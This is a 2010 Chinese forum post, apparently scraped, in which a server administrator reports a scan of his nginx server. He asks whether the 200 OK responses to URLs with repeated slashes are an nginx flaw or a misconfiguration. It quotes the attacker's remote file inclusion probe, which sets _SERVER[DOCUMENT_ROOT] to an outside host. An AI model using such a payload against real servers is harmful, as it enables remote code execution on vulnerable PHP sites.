这是不是nginx的一个URL处理漏洞?
时间:2010-07-01
来源:互联网
发现有人这样扫我服务器:
http://site.com////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
而我服务器竟然错误地给出了200 OK,显然这是个漏洞利用木马,因为我没开php所以暂时没事,但我测试了下:
http://site.com/////////// 200 OK
http://site.com///////////?fffffffffwwwwww 200 OK
http://site.com/?fffffffffwwwwww 200 OK
http://site.com///////////fffffffffwwwwww 404 Not Found
http://site.com/fffffffffwwwwww 404 Not Found
以上200 OK实际都是不存在的,我平台为centos 5.5 + nginx 0.765, 哪位知道毛病出在哪?漏洞还是我配置的有问题?
http://site.com////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
而我服务器竟然错误地给出了200 OK,显然这是个漏洞利用木马,因为我没开php所以暂时没事,但我测试了下:
http://site.com/////////// 200 OK
http://site.com///////////?fffffffffwwwwww 200 OK
http://site.com/?fffffffffwwwwww 200 OK
http://site.com///////////fffffffffwwwwww 404 Not Found
http://site.com/fffffffffwwwwww 404 Not Found
以上200 OK实际都是不存在的,我平台为centos 5.5 + nginx 0.765, 哪位知道毛病出在哪?漏洞还是我配置的有问题?
作者: hunforce 发布时间: 2010-07-01
我上面所说的site.com是我网站的代称,但实际上真正的site.com也是存在的,而且我扫了一下这个站,结果竟然和我站的扫面结果完全一样!!!晕了
而他的环境是Windows Server 2003 + Microsoft-IIS/6.0
各位不妨也扫下自己的
而他的环境是Windows Server 2003 + Microsoft-IIS/6.0
各位不妨也扫下自己的
作者: hunforce 发布时间: 2010-07-01
相关阅读 更多
热门阅读
-
office 2019专业增强版最新2021版激活秘钥/序列号/激活码推荐 附激活工具
阅读:74
-
如何安装mysql8.0
阅读:31
-
Word快速设置标题样式步骤详解
阅读:28
-
20+道必知必会的Vue面试题(附答案解析)
阅读:37
-
HTML如何制作表单
阅读:22
-
百词斩可以改天数吗?当然可以,4个步骤轻松修改天数!
阅读:31
-
ET文件格式和XLS格式文件之间如何转化?
阅读:24
-
react和vue的区别及优缺点是什么
阅读:121
-
支付宝人脸识别如何关闭?
阅读:21
-
腾讯微云怎么修改照片或视频备份路径?
阅读:28
